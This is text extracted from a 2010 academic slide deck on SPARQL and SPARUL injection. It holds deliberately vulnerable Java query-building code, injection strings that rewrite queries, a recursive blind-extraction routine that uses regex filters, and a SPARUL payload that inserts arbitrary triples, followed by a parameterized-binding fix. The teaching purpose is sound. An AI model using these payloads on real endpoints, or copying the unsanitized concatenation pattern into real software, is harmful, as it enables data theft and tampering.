identifying security issues in the semantic web: injection attacks in the semantic query languages

img/deustotech.png

IntroductionVulnerable code samples

Addressing code injectionConclusions

Addressing Security Issues in the Semantic Web:Injection attacks in the Semantic Query Languages

Pablo Orduna, Aitor Almeida, Unai Aguilera, Xabier Laiseca,Diego Lopez-de-Ipina, Aitor Gomez-Goiri

September 9th, 2010

Future Internet - Elkarlaneko ikerkuntza estrategikorako programa;ETORTEK 2008

P. Orduna, A. Almeida, U. Aguilera, X. Laiseca, D. Lopez-de. . . Addressing Security Issues in the Semantic Web: Injection att. . .

img/deustotech.png



IntroductionQuery LanguagesSecurity issues

Introduction

The Semantic Web is based on a set of technologies:

XMLRDFOWL. . .


img/deustotech.png




Query Languages

New technologies have been developed to query the ontologies

RDQLlater−−−→ SPARQL

later−−−→ SPARULThese new query languages are based on SQLRDQL and SPARQL → Read-only query languages

SPARUL (SPARQL/Update)introduces−−−−−−−→ modification

capabilities

SPARQL Sample:

1 PREFIX injection: <http://www.morelab.deusto.es/injection.owl#>

2 SELECT ?p13 WHERE {4 ?p1 a injection:Person .5 }


img/deustotech.png




Security issues

The use of these new query languages introduce vulnerabilitiesalready found in a bad use of query languages

Attacks like SQL Injection, LDAP Injection or even XPathInjection are already well knownLibraries provide tools to sanitize user input in these languages

A proper usage of the query languages is required in order toface new techniques, including:

(Blind) SPARQL InjectionSPARUL Injection


img/deustotech.png



SPARQL InjectionBlind SPARQL InjectionSPARUL Injection

SPARQL Injection

Introducing SPARQL InjectionThe following query is assumed to retrieve the friends of a userwhom fullName is provided by the variable nameThe ontology is available inhttp://www.morelab.deusto.es/injection.owl


http://www.morelab.deusto.es/injection.owl

img/deustotech.png




SPARQL Injection

1 String queryString =2 "PREFIX injection: <http://www.morelab.deusto.es

/injection.owl#> " +3 "SELECT ?name1 ?name2 " +4 "WHERE {" +5 " ?p1 a injection:Person . " +6 " ?p2 a injection:Person . " +7 " ?p1 injection:fullName ’" + name + "’ . "

+8 " ?p1 injection:isFriendOf ?p2 . " +9 " ?p1 injection:fullName ?name1 . " +

10 " ?p2 injection:fullName ?name2 . " +11 "}";12 Query query = QueryFactory.create(queryString);


img/deustotech.png




SPARQL Injection

Introducing SPARQL Injection

This code can be exploited to retrieve any information in theontologyThe problem is that the variable name has not been sanitized

This variable can include SPARQL code, and thus modify thequery itselfA variable with malicious content can be found in the nextslide


img/deustotech.png




Appending the Strings


/injection.owl#> " +3 "SELECT ?name1 ?name2 WHERE {" +4 " ?p1 a injection:Person . " +5 " ?p2 a injection:Person . " +6 " ?p1 injection:fullName ’" + name + "’ . " +7 " ?p1 injection:isFriendOf ?p2 . " +8 " ?p1 injection:fullName ?name1 . " +9 " ?p2 injection:fullName ?name2 . " +

10 "}";11 String name = "Pablo Orduna’ . " +12 "?b1 a injection:Building . " +13 "?b1 injection:name ?name1 . " +14 "} #";


img/deustotech.png




Appending the Strings


/injection.owl#> " +3 "SELECT ?name1 ?name2 WHERE {" +4 " ?p1 a injection:Person . " +5 " ?p2 a injection:Person . " +6 " ?p1 injection:fullName ’" + "Pablo Orduna’ .

" +7 " ?b1 a injection:Building . " +8 " ?b1 injection:name ?name1 . " +9 " } #" + "’ . " +

10 " ?p1 injection:isFriendOf ?p2 . " +11 " ?p1 injection:fullName ?name1 . " +12 " ?p2 injection:fullName ?name2 . " +13 "}";


img/deustotech.png




The final query


/injection.owl#> " +3 "SELECT ?name1 ?name2 WHERE {" +4 " ?p1 a injection:Person . " +5 " ?p2 a injection:Person . " +6 " ?p1 injection:fullName ’Pablo Orduna’ . " +7 " ?b1 a injection:Building . " +8 " ?b1 injection:name ?name1 . " +9 " } #" + /* From this point everything

10 is commented and thus ignored */ "’ . " +11 " ?p1 injection:isFriendOf ?p2 . " +12 " ?p1 injection:fullName ?name1 . " +13 " ?p2 injection:fullName ?name2 . " +14 "}";


img/deustotech.png




SPARQL Injection

This code will return the name of the building instead of thename of a user

It is possible to use the flexibility of SPARQL to perform otherkind of queries retrieving any information in the ontology


img/deustotech.png




Blind SPARQL Injection

Introducing Blind SPARQL InjectionThe previous sample was especially vulnerable since it returneda string

It is possible to retrieve any information as a stringStrings are usually not retrieved in SPARQL, but individuals

What if the returning value is an individual?

It’s still possible to retrieve any informationIf it’s possible to know if a given query is true or false, it’spossible to iteratively retrieve any information

The following code retrieves the individuals themselves

It’s possible to know if the query provided or not theindividuals


img/deustotech.png





1 String queryString =2 "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#>

" +3 "PREFIX injection: <http://www.morelab.deusto.es

/injection.owl#> " +4 "SELECT ?p1 ?p2 " +5 "WHERE {" +6 " ?p1 a injection:Person . " +7 " ?p2 a injection:Person . " +8 " ?p1 injection:fullName ’" + name + "’ˆˆxsd

:string . " +9 " ?p1 injection:isFriendOf ?p2 . " +

10 "}";11 Query query = QueryFactory.create(queryString);


img/deustotech.png





Once again, the variable name has not been sanitized

So it’s still possible to inject SPARQL codeThe injected code can’t return a building or the building nameBut, adding a condition like “does the building name start bythis letter” we will get:

The common results → so the building name starts by thatletterNo results → so the building name does not start by thatletter


img/deustotech.png





1 String queryString = /* PREFIXES ... */2 "SELECT ?p1 ?p2 " +3 "WHERE {" +4 " ?p1 a injection:Person . " +5 " ?p2 a injection:Person . " +6 " ?p1 injection:fullName ’" + name + "’ˆˆxsd

:string . " +7 " ?p1 injection:isFriendOf ?p2 . " +8 "}";9 String name = "Pablo Orduna’ . " +

10 "?b1 a injection:Building . " +11 "?b1 injection:name ?buildingName . " +12 "FILTER regex(?buildingName, \"ˆ" + s + ".*\")

. " +13 "} #"; // }:-D


img/deustotech.png




The final query would be. . .

1 "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#>" +

2 "PREFIX injection: <http://www.morelab.deusto.es/injection.owl#> " +

3 "SELECT ?p1 ?p2 WHERE {" +4 " ?p1 a injection:Person . " +5 " ?p2 a injection:Person . " +6 " ?p1 injection:fullName ’Pablo Orduna’ . " +7 " ?b1 a injection:Building . " +8 " ?b1 injection:name ?buildingName . " +9 " FILTER regex(?buildingName, \"ˆ" + s + ".*\")

. " +10 " } #" + /* from here ignored*/ "’ˆˆxsd:string .

" +11 " ?p1 injection:isFriendOf ?p2 . }";


img/deustotech.png




Querying recursively. . .

1 public static String recursively(String letters)throws Exception{

2 for(int i = 0; i < POSSIBLE_LETTERS.length(); ++i){

3 char c = POSSIBLE_LETTERS.charAt(i);4 if(tryBlind(letters + c)){5 System.out.println(c);6 return "" + c + recursively(letters + c);7 }8 }9 return "";

10 }


img/deustotech.png





It is possible to optimize this system using binary search

Performing queries using Regular Expressions like ˆ[A-M].*to know if the char is between the char A and MGiven a charset of length 64, we would reduce the number ofiterations from 64 times 10 (640) to 6 times 10 (60)

Using the whole UTF-16 charset, it would reduce the numberof iterations from 65536 times 10 (655360) to 16 times 10(160)

The point is that it’s possible to retrieve any information inthe ontology independently from the values returned by thequery


img/deustotech.png




SPARUL Injection

Introducing SPARQL/Update Injection

All the previous examples are executed in read-only querylanguagesSPARUL introduces the chance to modify the ontology

INSERT, MODIFY and DELETE statements are available

The following sample modifies the fullName of the resourceinjection:Pablo, setting it to the value of the variable name


img/deustotech.png




SPARUL Injection

1 String updateString = "PREFIX injection: <http://www.morelab.deusto.es/injection.owl#> " +

2 "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#>" +

3 "DELETE {" +4 " injection:Pablo injection:fullName ?name1 "+5 "} WHERE {" +6 " injection:Pablo injection:fullName ?name1" +7 "}\n INSERT {" +8 " injection:Pablo injection:fullName ’" + name +

"’ˆˆxsd:string" +9 "}";

10 UpdateRequest update = UpdateFactory.create(updateString);


img/deustotech.png




SPARUL Injection

1 String name = "Pablo Ordunya’ˆˆxsd:string" +2 "} \n " +3 "INSERT {" +4 " injection:Pablo injection:isFriendOf

injection:EvilMonkey" +5 "} #"; // }:-D6 String result = sample.run(name);

With this vulnerability, it is possible to modify the wholeontology.


img/deustotech.png



Introduction

Addressing code injection

Mechanisms provided by the library must be used (if provided)

Not as simple as scaping the ’ characters: the string \u0027 isa simple quote, just as in Java

1 System.out.println("a\u0022.length() +\u0022b".length());

2 // This code prints "2", the result of("a".length() + "b".length())

3 // since \u0022 will be replaced by "even if it is commented or inside

4 // String


img/deustotech.png



Introduction

Frameworks

In Jena, the initialBinding argument can be used in theQueryExecutionFactory

1 // initial binding2 QuerySolutionMap initialBinding = new

QuerySolutionMap();3 RDFNode parameterizedName = model.createLiteral(

name);4 initialSetting.add("thename", parameterizedName);5

6 // Perform the query7 Query query = QueryFactory.create(queryString);8 QueryExecution qe = QueryExecutionFactory.create(

query, model, initialBinding);9 ResultSet results = qe.execSelect();


img/deustotech.png



Conclusions

Not sanitizing the user input might add a set of securityvulnerabilities in our systems

In the paper it is presented how new query languages inheritsecurity issues present in older query languages, and thereforethey should also be taken into account when working withthem


img/deustotech.png



Questions?

DeustoTech - Internet

http://www.morelab.deusto.es

Pablo Orduna [email protected]

Aitor Almeida [email protected]

Unai Aguilera [email protected]

Xabier Laiseca [email protected]

Diego Lopez-de-Ipina [email protected]

Aitor Gomez-Goiri [email protected]


http://www.morelab.deusto.es/

http://www.morelab.deusto.es/

mailto:[email protected]






identifying security issues in the semantic web: injection attacks in the semantic query languages

Technology

p1 injection

p2 injection

prefix injection

query query

sql injection

injection attacks

ldap injection

aitor almeida